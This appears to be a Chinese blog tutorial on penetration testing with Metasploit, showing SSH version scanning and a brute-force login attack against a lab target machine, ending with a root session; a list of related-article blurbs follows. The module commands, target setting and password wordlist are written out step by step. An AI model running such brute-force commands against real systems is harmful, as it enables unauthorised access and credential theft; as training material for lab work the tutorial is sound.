2022-渗透测试-信息收集-Metasploit(基于SSH协议)

简介: 2022-渗透测试-信息收集-Metasploit(基于SSH协议)

 目录

 

1.查看SSH服务的版本信息

2.对ssh进行暴力破解

1.查看SSH服务的版本信息

打开kali系统的Metasploit软件。

image.gif编辑

search version

image.gif编辑

2.use auxiliary/scanner/ssh/ssh_version

image.gif编辑

3.show options

image.gif编辑 4.set RHOSTS 192.168.0.112  设置目标主机-靶机

image.gif编辑

5.run

image.gif编辑

版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

2.对ssh进行暴力破解

1.search ssh_login

image.gif编辑

2.使用模块use auxiliary/scanner/ssh/ssh_login

image.gif编辑

3.查看需要配置的参数show options

image.gif编辑

4.设置目标主机 set RHOSTS 192.168.0.112

image.gif编辑

5.设置字典

set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。

image.gif编辑

6.将破解的详细信息打印出来 set VERBOSE true

image.gif编辑

7.run

image.gif编辑

8.creds 列出所有数据库中的凭据,也就是账号和密码

image.gif编辑

9.sessions 查看会话

image.gif编辑

10. 进入会话 sessions -i 1

此时,我们是以root用户进来的。

image.gif编辑

相关文章
|
2月前
|
移动开发 监控 安全
通过SSH协议实现的屏幕局域网电脑监控:屏幕安全访问代码
随着科技的不断发展,网络安全问题愈发突出。为了确保屏幕数据的安全,我们需要一种高效可靠的监控方法。本文介绍了一种基于SSH协议的屏幕局域网电脑监控方案,同时提供了相关代码示例,确保屏幕数据的安全传输和访问。
186 0
|
2月前
|
存储 缓存 网络协议
dpdk课程学习之练习笔记二(arp, udp协议api测试)
dpdk课程学习之练习笔记二(arp, udp协议api测试)
35 0
|
27天前
|
安全 API 网络架构
API测试中常用测试协议
API测试中常用测试协议
|
30天前
|
Linux 网络安全
CentOS7服务器SSH登陆时自动显示服务器基础信息
CentOS7服务器SSH登陆时自动显示服务器基础信息
18 0
|
1月前
|
安全 Shell 网络安全
远程登录安全连接协议SSH(Secure Shell)
SSH(Secure Shell)协议是一种用于在不安全网络上提供安全远程登录、命令执行和数据传输的加密网络协议,通过公钥加密和身份验证技术确保通信的安全性和隐私性。
44 0
|
2月前
|
Web App开发 测试技术 API
Postman软件基本用法:浏览器复制请求信息并导入到软件从而测试、发送请求
Postman软件基本用法:浏览器复制请求信息并导入到软件从而测试、发送请求
|
2月前
|
人工智能 安全 测试技术
软件测试/人工智能|HTTPS加密协议,你会多少?
软件测试/人工智能|HTTPS加密协议,你会多少?
|
2月前
|
存储 网络安全 开发工具
Git的GUI图形化工具&ssh协议&IDEA集成Git
Git的GUI图形化工具&ssh协议&IDEA集成Git
89 0
|
2月前
|
Shell 网络安全 开发工具
git02->gui图形化界面使用,ssh协议,idea集成GIT
git02->gui图形化界面使用,ssh协议,idea集成GIT
39 0
git02->gui图形化界面使用,ssh协议,idea集成GIT
|
2月前
|
安全 网络安全 开发工具
更安全的ssh协议与Gui图形化界面使用
更安全的ssh协议与Gui图形化界面使用